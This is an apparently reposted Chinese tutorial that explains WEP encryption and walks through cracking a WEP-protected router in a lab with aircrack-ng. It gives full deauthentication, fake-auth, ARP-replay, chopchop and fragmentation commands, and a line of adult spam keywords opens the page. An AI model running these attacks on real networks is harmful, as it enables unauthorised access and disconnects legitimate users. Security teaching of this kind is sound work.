国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

無線WiFi安全滲透與攻防(五)之a(chǎn)ircrack-ng破解WEP加密

這篇具有很好參考價值的文章主要介紹了無線WiFi安全滲透與攻防(五)之a(chǎn)ircrack-ng破解WEP加密。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點(diǎn)擊"舉報違法"按鈕提交疑問。

系列文章

無線WiFi安全滲透與攻防(一)之無線安全環(huán)境搭建
無線WiFi安全滲透與攻防(二)之打造專屬字典
無線WiFi安全滲透與攻防(三)之Windows掃描wifi和破解WiFi密碼
無線WiFi安全滲透與攻防(四)之kismet的使用

aircrack-ng破解WEP加密

1.WEP介紹

其實(shí)我們平常在使用wifi的時候,往往會用到的加密方式主要有WEP(pre-RSNA), WPA(TKIP), WPA2(CCMP-AES), 如果有個別對安全要求比較高的也會使用企業(yè)級加密(802.1x). 在最新的802.11-2010標(biāo)準(zhǔn)中,有明確的支持新的無線設(shè)備應(yīng)該拋棄WEP和WPA加密方式,而且必須支持WPA2加密方式,但是不得不接受的是,現(xiàn)在我們是有的大多數(shù)設(shè)備并沒有更新的這么快,廣泛的WEP和WPA仍然在使用中,而且新開發(fā)的設(shè)備也應(yīng)該保持對他們的兼容,所以即使在最新開發(fā)的產(chǎn)品中也并沒有完全按照802.11-2010的要求,直接放棄對WEP和WPA的支持。

剛開始了解無線加密,也有必要從WEP加密開始掌握WEP-WPA-WPA2-802.1x等相關(guān)知識,一是這些東西至少在當(dāng)前階段還用的上,二是后面那些更高級的加密方法其實(shí)根本上還是基于WEP加密思想改進(jìn)而來的。

其實(shí)無線加密主要是對數(shù)據(jù)在鏈路層進(jìn)行加密,如下圖,802.11主要是對physical[?f?z?kl]和Data-link層進(jìn)行了定義,而數(shù)據(jù)鏈路層又分成兩個部分,媒介訪問控制(MAC)和邏輯鏈路控制(LLC),無線數(shù)據(jù)的加密處理就是在MAC和LLC兩個階段中間做的事情,加密的對象就是MSDU。

無線WiFi安全滲透與攻防(五)之a(chǎn)ircrack-ng破解WEP加密

所以對于沒有MSDP的無線幀是不用加密的,比如管理幀只攜帶layer [ler] 2的信息,不需要加密;控制幀只有頭部和尾部,不需要加密;空幀沒有數(shù)據(jù)域(但有特定的功能),也不需要加密; 總之,需要加密的幀,往往是數(shù)據(jù)幀。

2.認(rèn)證類型

加密的分類主要包括共享秘鑰認(rèn)證和開放系統(tǒng)認(rèn)證,WEP加密是共享秘鑰式,而TKIP、CCMP和802.1x則是開放系統(tǒng),這兩種分類個人覺得主要區(qū)別是先完成秘鑰認(rèn)證再進(jìn)行關(guān)聯(lián),還是先完成關(guān)聯(lián)再進(jìn)行秘鑰認(rèn)證。比如,它要求無線客戶端發(fā)送的authentication [???θent??ke??n] 報文中指定加密方式,如果是共享秘鑰就會進(jìn)行秘鑰的確認(rèn),如果是開放系統(tǒng),則會留到后面關(guān)聯(lián)成功后進(jìn)行秘鑰的確認(rèn)。

1.開放系統(tǒng)認(rèn)證

這種認(rèn)證方式不需要確認(rèn)STA的任何信息,它只是和AP進(jìn)行一個招呼式的交互,這個過程中并沒有交互身份信息,所以也可以認(rèn)為是一個空加密。這樣做的目的是,雙方都認(rèn)為應(yīng)該在后面使用更安全的加密方式,在這里只是先打個招呼,STA先進(jìn)來,我們慢慢坐下核對信息。所以STA發(fā)送的第一個Authentication [???θent??ke??n] 報文只要表面自己使用的開放系統(tǒng)認(rèn)證就好了,AP自然會給予successful答復(fù),接著后面順利完成關(guān)聯(lián)。

無線WiFi安全滲透與攻防(五)之a(chǎn)ircrack-ng破解WEP加密

2.共享秘鑰認(rèn)證

這種認(rèn)證方式使用WEP認(rèn)證STA,所以這種認(rèn)證的前提是STA和AP都有配置靜態(tài)的WEP秘鑰,因此認(rèn)證的目的就是確認(rèn)兩者使用的秘鑰是否一致。共享秘鑰認(rèn)證是通過4個認(rèn)證幀的交互來完成的,STA首先發(fā)送一個Authentication request給AP,然后AP會給STA回復(fù)一個挑戰(zhàn)明文,接著STA使用秘鑰對這個明文進(jìn)行加密并發(fā)送給AP,最后AP對其進(jìn)行解密,如果能夠解密成功并且明文一致則表示認(rèn)證成功并回復(fù)。

無線WiFi安全滲透與攻防(五)之a(chǎn)ircrack-ng破解WEP加密

雖然看起來,共享秘鑰認(rèn)證比開放系統(tǒng)認(rèn)證會更安全,其實(shí)實(shí)際上并不是這樣,因?yàn)閷τ诠蚕砻罔€認(rèn)證,攻擊者可以捕獲明文內(nèi)容,也可以捕獲加密后的密文,那就很容易被破解,而且秘鑰一旦被破解,那么后面交互的所有數(shù)據(jù)包都能輕易的解密。

3.加密算法介紹

根據(jù)加密算法的分類,可以分為同步加密算法和異步加密算法:

同步加密算法:這種算法不管是加密還是解密,都是使用同一個秘鑰,為了確保數(shù)據(jù)的安全,就需要對這么秘鑰進(jìn)行保護(hù),但問題是在進(jìn)行認(rèn)證的時候必須對這個秘鑰進(jìn)行確認(rèn),那么就需要提出一種安全的確認(rèn)秘鑰的方法,這些方法包括WEP, TKIP, and CCMP。

異步加密算法:這種算法包含了兩個秘鑰,分別是公鑰和私鑰,公鑰用于消息的加密,私鑰用于消息的解密,所以即使有好多人知道公鑰,沒有私鑰也破解不了消息。

流加密和塊加密: 流加密以一個bit為單位進(jìn)行處理,塊加密以一個塊為單位進(jìn)行處理

4.WEP加密和解密

1.加密

WEP是一個Layer 2的加密方法,它使用的是ARC4流加密。它有一個數(shù)據(jù)完整性校驗(yàn)操作,也就是Integrity Check Value (ICV),這個值是通過計算為加密的數(shù)據(jù)域(MSDU)而來的。

802.11標(biāo)準(zhǔn)定義了兩個WEP版本,分別是WEP-40和WEP-104支持64bit和128bit加密,其實(shí)40和104都是從64與128減24得來的,這24位叫初始化向量Initialization Vector (IV),注意和ICV進(jìn)行區(qū)分。

無線WiFi安全滲透與攻防(五)之a(chǎn)ircrack-ng破解WEP加密

40和104則是指靜態(tài)秘鑰的bit長度,也就是說

WEP-40支持輸入10 hex characters or 5 ASCII characters,10位16進(jìn)制或5位ASCII字符

WEP-104支持輸入26 hex characters or 13 ASCII characters:26位16進(jìn)制或13位ASCII 字符

無線WiFi安全滲透與攻防(五)之a(chǎn)ircrack-ng破解WEP加密

一般來說,WEP支持4個key,使用時從中選一個進(jìn)行加密。

那么WEP加密過程是怎么實(shí)現(xiàn)的呢?下面根據(jù)流程圖來分析一下

無線WiFi安全滲透與攻防(五)之a(chǎn)ircrack-ng破解WEP加密

(1) IV是動態(tài)生成的24bit隨機(jī)數(shù),標(biāo)準(zhǔn)沒有指定應(yīng)該怎么生成,而且在數(shù)據(jù)幀中以明文的方式進(jìn)行發(fā)送,它和key結(jié)合生成隨機(jī)種子(seed),然后運(yùn)用CR4算法生成秘鑰流(keystream)。

(2)對需要加密的明文進(jìn)行CRC-32運(yùn)算,生成 ICV(32位),然后將這個 ICV 追加到 plaintext的后面

(3)將尾部有 ICV的plaintext 與密碼流進(jìn)行異或運(yùn)算,得到加密數(shù)據(jù)

(4)將 IV 添加到加密數(shù)據(jù)的前面,進(jìn)行傳送。

下面是WEP加密后的一個數(shù)據(jù)幀MPDU 格式:

無線WiFi安全滲透與攻防(五)之a(chǎn)ircrack-ng破解WEP加密

從上圖可以看出,在幀體部分包括 IV + MSDU + ICV:

IV一共是4個字節(jié),前3個字節(jié)是24bit的初始化向量,后面6bit暫時預(yù)留空白沒用,最后兩個bit用來指定使用哪個key,我們前面有提到過,WEP可以配置4個KEY。

MSDU和ICV是被加密的,在解密的時候,需要檢驗(yàn)ICV是否一致

2.解密

和加密相反,解密也需要這幾個過程:

無線WiFi安全滲透與攻防(五)之a(chǎn)ircrack-ng破解WEP加密

(1)IV和key結(jié)合生成隨機(jī)種子(seed),然后運(yùn)用ACR4算法生成秘鑰流(keystream)

(2)將keystream和加密數(shù)據(jù)進(jìn)行異或,得到 plaintext 和 ICV

(3)根據(jù)解密后得到的 plaintext 再計算一個 ICV 和包中的 ICV進(jìn)行比較,判斷是否相等,這也算是一個可靠性的保證。

5.Aircrack-ng 常用工具包

aircrack-ng:破解

airmon-ng:改變網(wǎng)卡工作模式,將網(wǎng)卡從Managed Mode 改變?yōu)?Monitor Mode

airodump-ng:抓包工具,用于捕獲報文

aireplay-ng:提供各種攻擊,為airodump-ng創(chuàng)造更多的報文

airserv-ng:網(wǎng)卡連接到指定端口 可以用來做無線跳板

airolib-ng:彩虹表破解創(chuàng)建數(shù)據(jù)庫文件

airdecap-ng:解包

6.Aireplay-ng 的 6 種攻擊模式詳解

1.沖突模式

-0 Deautenticate 沖突模式

使已經(jīng)連接的合法客戶端強(qiáng)制斷開與路由端的連接,使其重新連接。在重新連接過程中獲得驗(yàn)證數(shù)據(jù)包,從而產(chǎn)生有效 ARP request。

如果一個客戶端連在路由端上,但是沒有人上網(wǎng)以產(chǎn)生有效數(shù)據(jù),此時,即使用-3 也無法產(chǎn)生有效 ARP request。所以此時需要用-0 攻擊模式配合,-3 攻擊才會被立刻激活。

aireplay-ng -0 10 –a <ap mac> -c <my mac> wifi0
【-0】:沖突攻擊模式,后面跟發(fā)送次數(shù)(設(shè)置為 0,則為循環(huán)攻擊,不停的斷開連接,客戶端無法正常上網(wǎng))
【-a】:設(shè)置 ap 的 mac
【-c】:設(shè)置已連接的合法客戶端的 mac。
如果不設(shè)置-c,則斷開所有和 ap 連接的合法客戶端。
aireplay-ng -3 -b <ap mac> -h <my mac> wifi0
注:使用此攻擊模式的前提是必須有通過認(rèn)證的合法的客戶端連接到路由器

2.偽裝客戶端連接

-1 fakeauth count 偽裝客戶端連接

這種模式是偽裝一個客戶端和 AP 進(jìn)行連接。

這步是無線客戶端的研究學(xué)習(xí)的第一步,因?yàn)槭菬o合法連接的客戶端,因此需要一個偽裝客戶端來和路由器相連。為讓 AP 接受數(shù)據(jù)包,必須使自己的網(wǎng)卡和 AP 關(guān)聯(lián)。如果沒有關(guān)聯(lián)的話,目標(biāo) AP 將忽略所有從你網(wǎng)卡發(fā)送的數(shù)據(jù)包,IVS 數(shù)據(jù)將不會產(chǎn)生。

用-1 偽裝客戶端成功連接以后才能發(fā)送注入命令,讓路由器接受到注入命令后才可反饋數(shù)據(jù)從而產(chǎn)生 ARP 包。

aireplay-ng -1 0 –e <ap essid> -a <ap mac> -h <my mac> wifi0
參數(shù)說明:
【-1】:偽裝客戶端連接模式,后面跟延時
【-e】:設(shè)置 ap 的 essid
【-a】:設(shè)置 ap 的 mac
【-h】:設(shè)置偽裝客戶端的網(wǎng)卡 MAC(即自己網(wǎng)卡 mac)

3.交互模式

-2 Interactive 交互模式

這種攻擊模式是一個抓包和提數(shù)據(jù)發(fā)攻擊包,三種集合一起的模式

1.這種模式主要用于研究學(xué)習(xí)無客戶端,先用-1 建立虛假客戶端連接然后直接發(fā)包攻擊

aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b <ap mac> -h <my mac> wifi0
參數(shù)說明:
【-2】:交互攻擊模式
【-p】:設(shè)置控制幀中包含的信息(16 進(jìn)制),默認(rèn)采用 0841
【-c】:設(shè)置目標(biāo) mac 地址
【-b】:設(shè)置 ap 的 mac 地址
【-h】:設(shè)置偽裝客戶端的網(wǎng)卡 MAC(即自己網(wǎng)卡 mac)

2.提取包,發(fā)送注入數(shù)據(jù)包, 發(fā)包攻擊。

 aireplay-ng -2 –r <file> -x 1024 wifi0
 -x 1024 是限定發(fā)包速度,避免網(wǎng)卡死機(jī),可以選擇 1024

4.注入攻擊模式

-3 ARP-request 注入攻擊模式

這種模式是一種抓包后分析重發(fā)的過程 這種攻擊模式很有效。既可以利用合法客戶端,也可以配合-1 利用虛擬連接的偽裝客戶端。如果有合法客戶端那一般需要等幾分鐘,讓合法客戶端和 ap 之間通信,少量數(shù)據(jù)就可產(chǎn)生有效 ARP request 才可利用-3模式注入成功。如果沒有任何通信存在,不能得到 ARP request.,則這種攻擊就會失敗。

如果合法客戶端和ap之間長時間內(nèi)沒有 ARP request,可以嘗試同時使用-0 攻擊. 如果沒有合法客戶端,則可以利用-1 建立虛擬連接的偽裝客戶端,連接過程中獲得驗(yàn)證數(shù)據(jù)包,從而產(chǎn)生有效 ARP request。再通過-3 模式注入。

aireplay-ng -3 -b <ap mac> -h <my mac> -x 512 wifi0
參數(shù)說明:
【-3】:arp 注入攻擊模式
【-b】:設(shè)置 ap 的 mac
【-h】:設(shè)置自己的mac地址
【-x】:定義每秒發(fā)送數(shù)據(jù)戶包的數(shù)量,但是最高不超過 1024,建議使用 512(也可不定義)

5.Chopchop 攻擊模式

-4 Chopchop 攻擊模式

用以獲得一個包含密鑰數(shù)據(jù)的 xor 文件 這種模式主要是獲得一個可利用包含密鑰數(shù)據(jù)的 xor 文件,不能用來解密數(shù)據(jù)包。而是用它來產(chǎn)生一個新的數(shù)據(jù)包以便我們可以進(jìn)行注入。

aireplay-ng -4 -b <ap mac> -h <my mac> wifi0 
參數(shù)說明:
【-b】:設(shè)置需要研究學(xué)習(xí)的 AP 的 mac
【-h】:設(shè)置虛擬偽裝連接的 mac(即自己網(wǎng)卡的 mac)

6.碎片包攻擊模式

-5 fragment 碎片包攻擊模式

用以獲得 PRGA(包含密鑰的后綴為 xor 的文件) 這種模式主要是獲得一個可利用 PRGA,這里的 PRGA 并不是 wep key 數(shù)據(jù),不能用來解密數(shù)據(jù)包。而是用它來產(chǎn)生一個新的數(shù)據(jù)包以便我們可以進(jìn)行注入。其工作原理就是使目標(biāo) AP 重新廣播包,當(dāng) AP 重廣播時,一個新的 IVS 將產(chǎn)生,我們就是利用這個來研究學(xué)習(xí)

aireplay-ng -5 -b <ap mac> -h <my mac> wifi0
【-5】:碎片包攻擊模式
【-b】:設(shè)置 ap 的 mac
【-h】:設(shè)置虛擬偽裝連接的 mac(即自己網(wǎng)卡的 mac)

7.WEP wifi破解步驟

1.環(huán)境準(zhǔn)備

1.路由器介紹

本文使用的路由器為:思科企業(yè)級內(nèi)置雙天線cvr100無線路由器,支持WEP,WPA,WPS加密方式,一般的家用路由器或者比較新的路由器不支持以上三種模式。

2.路由器配置

1.選擇無線配置,設(shè)置wifi信道為1

無線WiFi安全滲透與攻防(五)之a(chǎn)ircrack-ng破解WEP加密

2.選擇無線wifi–設(shè)置安全模式

無線WiFi安全滲透與攻防(五)之a(chǎn)ircrack-ng破解WEP加密

3.安全模式選擇wep,輸入口令-點(diǎn)擊生成密鑰,點(diǎn)擊顯示密鑰,點(diǎn)擊保存

無線WiFi安全滲透與攻防(五)之a(chǎn)ircrack-ng破解WEP加密

2.查看網(wǎng)卡是否連接到kali

ip a

無線WiFi安全滲透與攻防(五)之a(chǎn)ircrack-ng破解WEP加密

3.開啟Monitor Mode工作模式

airmon-ng start wlan0

無線WiFi安全滲透與攻防(五)之a(chǎn)ircrack-ng破解WEP加密

4.掃描附近的wifi

確定目標(biāo)wifi的信道,加密方式,信號強(qiáng)度,mac地址等信息

airodump-ng wlan0mon

無線WiFi安全滲透與攻防(五)之a(chǎn)ircrack-ng破解WEP加密

5.對目標(biāo)所在信道進(jìn)行抓包

airodump-ng wlan0mon -c 1 --ivs -w /root/wifi/bk01/WEP --bssid 10:BD:18:08:43:31
-c:信道
--ivs:初始化向量
-w:輸出抓包文件
--bssid:指定wifi進(jìn)行抓包

無線WiFi安全滲透與攻防(五)之a(chǎn)ircrack-ng破解WEP加密

6.手工創(chuàng)建客戶端連接

設(shè)備連接wifi

當(dāng)有設(shè)備連接AP時,工具會捕獲到這個客戶端的mac地址即相關(guān)信息

無線WiFi安全滲透與攻防(五)之a(chǎn)ircrack-ng破解WEP加密

7.進(jìn)行ARP注入攻擊

arp重放攻擊,通過模擬客戶端發(fā)送ARP請求,獲取AP的響應(yīng)報文,通過AP報文獲取ivs初始化向量

aireplay-ng -3 -b 10:BD:18:08:43:31 -h 68:54:5A:85:CB:40 wlan0mon
-3:arpreplay:arp重放攻擊
-b:bssid AP的mac地址
-h:客戶端的mac地址

無線WiFi安全滲透與攻防(五)之a(chǎn)ircrack-ng破解WEP加密

遇到這個錯誤時,重新連接wifi會一直報【無法連接到該wifi】,這時候,需要ctrl+C停掉arp重放攻擊,然后重新在發(fā)起一個新的arp重放攻擊,在連接wifi就ok了

8.使用Deautenticate攻擊模式

使已經(jīng)連接的合法客戶端強(qiáng)制斷開與路由端的連接,使其重新連接。在重新連接過程中獲得驗(yàn)證數(shù)據(jù)包,從而產(chǎn)生有效 ARP request。(也不一定能成功,不成功多試幾次)

aireplay-ng -0 5 -a 10:BD:18:08:43:31 -c 68:54:5A:85:CB:40 wlan0mon
-0:沖突攻擊模式,后面跟發(fā)送次數(shù)(設(shè)置為 0,則為循環(huán)攻擊,不停的斷開連接,客戶端無法正常上網(wǎng))
-a:設(shè)置 ap 的 mac
-c:設(shè)置已連接的合法客戶端的 mac

無線WiFi安全滲透與攻防(五)之a(chǎn)ircrack-ng破解WEP加密
無線WiFi安全滲透與攻防(五)之a(chǎn)ircrack-ng破解WEP加密

9.手動連接AP

等待Frame到5-10萬時,就可以嘗試破解了

無線WiFi安全滲透與攻防(五)之a(chǎn)ircrack-ng破解WEP加密

10.破解WIFI,獲取WEP密碼

aircrack-ng /root/wifi/bk01/WEP-01.ivs

無線WiFi安全滲透與攻防(五)之a(chǎn)ircrack-ng破解WEP加密

遇到這種說明ivs樣本不夠,按ctrl+c退出,在等一會重新執(zhí)行破解命令就可以。也可以在這個界面保持不動,當(dāng)ivs達(dá)到5000時,他會自動重新破解

ivs樣本足夠時,很快就能破解出來了

無線WiFi安全滲透與攻防(五)之a(chǎn)ircrack-ng破解WEP加密

把冒號去掉就是密鑰了,然后用這個密鑰就可以連接WEP加密的WIFI了文章來源地址http://www.zghlxwxcb.cn/news/detail-408997.html

到了這里,關(guān)于無線WiFi安全滲透與攻防(五)之a(chǎn)ircrack-ng破解WEP加密的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點(diǎn)僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔(dān)相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實(shí)不符,請點(diǎn)擊違法舉報進(jìn)行投訴反饋,一經(jīng)查實(shí),立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費(fèi)用

相關(guān)文章

  • 無線WiFi安全滲透與攻防(十三)之WPA破解-windows下GPU跑包加速

    無線WiFi安全滲透與攻防(十三)之WPA破解-windows下GPU跑包加速

    實(shí)現(xiàn)GPU加速的前提條件: 英偉達(dá)公司 設(shè)計的 計算統(tǒng)一設(shè)備架構(gòu) AMD 設(shè)計的 流開放計算庫 openCL 通過這兩個技術(shù),可以讓顯卡幫我們進(jìn)行計算滲透 一個非常不錯的網(wǎng)絡(luò)網(wǎng)絡(luò)破解工具,可以直接破解握手包,xp系統(tǒng)下速度非常快。EWSA全稱Elcomsoft Wireless Security Auditor。號稱可以利

    2024年02月16日
    瀏覽(19)
  • kali-進(jìn)行抓包以及aircrack-ng跑包和hashcat跑包

    kali-進(jìn)行抓包以及aircrack-ng跑包和hashcat跑包

    環(huán)境: VMware? Workstation 16 Pro kali-linux-2023.1 64位 python3.9.13 RT3070-USB無線網(wǎng)卡 1.首先按下win+r打開運(yùn)行窗口 2.輸入services.msc,然后按回車鍵即可進(jìn)入服務(wù) 3.找到VMware USB Arbitration Service 右擊啟動 4.右鍵虛擬機(jī),設(shè)置,在USB控制器中,勾選USB兼容性2.0以及顯示所有USB輸入設(shè)備 5.打開k

    2024年01月16日
    瀏覽(20)
  • 無線WiFi安全滲透與攻防(二)之打造專屬字典

    無線WiFi安全滲透與攻防(二)之打造專屬字典

    系列文章 無線WiFi安全滲透與攻防(一)之無線安全環(huán)境搭建 什么在破解之前先準(zhǔn)備專用字典,因?yàn)閷τ谝话慵彝碚f,常用 一個是預(yù)共享密鑰PSK,一個是PIN碼。 也不是所有的路由都開起了PIN碼,一般都會開啟域共享密鑰。 1.概念 (1).預(yù)共享密鑰模式 預(yù)共享密鑰模式(pre-

    2024年02月13日
    瀏覽(51)
  • Aircrack 破解無線網(wǎng)密碼 (跑字典法)

    Aircrack 破解無線網(wǎng)密碼 (跑字典法)

    本教程屬于練習(xí),請勿做違法犯罪行為。 什么是Aircrack-ng Aircrack-ng是一款用于破解無線802.11WEP及WPA-PSK加密的工具,該工具在2005年11月之前名字是Aircrack,在其2.41版本之后才改名為Aircrack-ng。 Aircrack-ng主要使用了兩種攻擊方式進(jìn)行wap破解:一種是FMS攻擊,該攻擊方式是以發(fā)現(xiàn)該

    2024年02月04日
    瀏覽(23)
  • kali使用aircrack無線攻擊wifi超詳細(xì)步驟(包含監(jiān)聽網(wǎng)卡啟動,獲得握手包,密碼本生成)

    kali使用aircrack無線攻擊wifi超詳細(xì)步驟(包含監(jiān)聽網(wǎng)卡啟動,獲得握手包,密碼本生成)

    平臺及工具: linux:kali平臺 aircrack - ng 工具 免驅(qū)監(jiān)聽網(wǎng)卡 詳細(xì)操作 1.首先啟動kali,插入網(wǎng)卡,輸入ifconfig查看kali是否檢測到監(jiān)聽網(wǎng)卡,注意監(jiān)聽網(wǎng)卡要免驅(qū)動的。 ?如圖,看到wlan0就代表kali成功檢測到監(jiān)聽網(wǎng)卡啦。 2.在啟動網(wǎng)卡的監(jiān)聽模式之前一定要?dú)⑺肋M(jìn)程,否則將會監(jiān)

    2024年02月16日
    瀏覽(25)
  • kali入門到放棄系列二:破解wifi無線密碼

    kali入門到放棄系列二:破解wifi無線密碼

    前置條件: 建議在淘寶購買一個linux免驅(qū)動無線網(wǎng)卡(自己買過綠聯(lián),水星等等無線網(wǎng)卡,發(fā)現(xiàn)都不能做到linux免驅(qū)動) 先上一張破解過程的圖 以下是正式流程: 1.kali系統(tǒng)登錄后,執(zhí)行 ifconfig? 看到反饋的結(jié)果 wlan0就是無線網(wǎng)卡 2、開始監(jiān)聽,?執(zhí)行???????? 結(jié)果如下:

    2023年04月10日
    瀏覽(23)
  • 無線網(wǎng)卡+kali實(shí)現(xiàn)wifi暴力破解(密碼爆破方式)

    無線網(wǎng)卡+kali實(shí)現(xiàn)wifi暴力破解(密碼爆破方式)

    攻擊機(jī):kali 所采用的的無線網(wǎng)卡:D-LINK 采用的工具:Aircrack-ng 測試開始: 首先,打開kali,將無線網(wǎng)卡插入。彈出提示窗口,這里選擇連接到虛擬機(jī),選擇kali虛擬機(jī)。 然后點(diǎn)擊網(wǎng)絡(luò)連接的標(biāo)志,可以看到當(dāng)前環(huán)境的wifi列表。 使用命令ifconfig和iwconfig,都可以看到wlan0已開啟

    2023年04月09日
    瀏覽(22)
  • 無線滲透----掃描附近WiFi(windows系統(tǒng))

    無線滲透----掃描附近WiFi(windows系統(tǒng))

    目錄 一.WiFi掃描 1.WirelessMon軟件介紹 2.WirelessMon軟件使用 二.Windows破解WiFi密碼 1.以管理員方式打開cmd 2.查看連接過的wifi 3.輸入破解命令 4.找到wifi密碼 ?5.破解多個wifi密碼 6.找到對應(yīng)文件查看wifi密碼 WirelessMon是一款無線網(wǎng)絡(luò)掃描工具,它可以幫助用戶掃描附近的無線信號,除

    2024年02月11日
    瀏覽(25)
  • redis安全攻防(專注滲透視角)

    redis安全攻防(專注滲透視角)

    對于所有筆記中復(fù)現(xiàn)的這些終端或者服務(wù)器,都是自行搭建的環(huán)境進(jìn)行滲透的。這里使用的技術(shù)僅用于學(xué)習(xí)教育目的,如果列出的技術(shù)用于其他任何目標(biāo),我概不負(fù)責(zé)。 數(shù)據(jù)庫作為業(yè)務(wù)平臺信息技術(shù)的核心和基礎(chǔ),承載著越來越多的關(guān)鍵數(shù)據(jù),漸漸成為單位公共安全中最具有

    2024年02月07日
    瀏覽(23)
  • 【網(wǎng)絡(luò)安全】-- 網(wǎng)絡(luò)滲透技術(shù)攻防(--更新中)

    1.1.1 什么是網(wǎng)絡(luò)滲透攻擊 “網(wǎng)絡(luò)滲透攻擊”是對大型的網(wǎng)絡(luò)主機(jī)服務(wù)器群組采用的一種迂回漸進(jìn)式的攻擊方法,通過長期而有計劃的逐步滲透攻擊進(jìn)入網(wǎng)絡(luò),最終控制整個網(wǎng)絡(luò)。 1.1.2 網(wǎng)絡(luò)滲透測試的意義 滲透測試是受信任的第三方進(jìn)行的一種評估網(wǎng)絡(luò)安全的活動,它通過運(yùn)

    2024年02月13日
    瀏覽(23)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包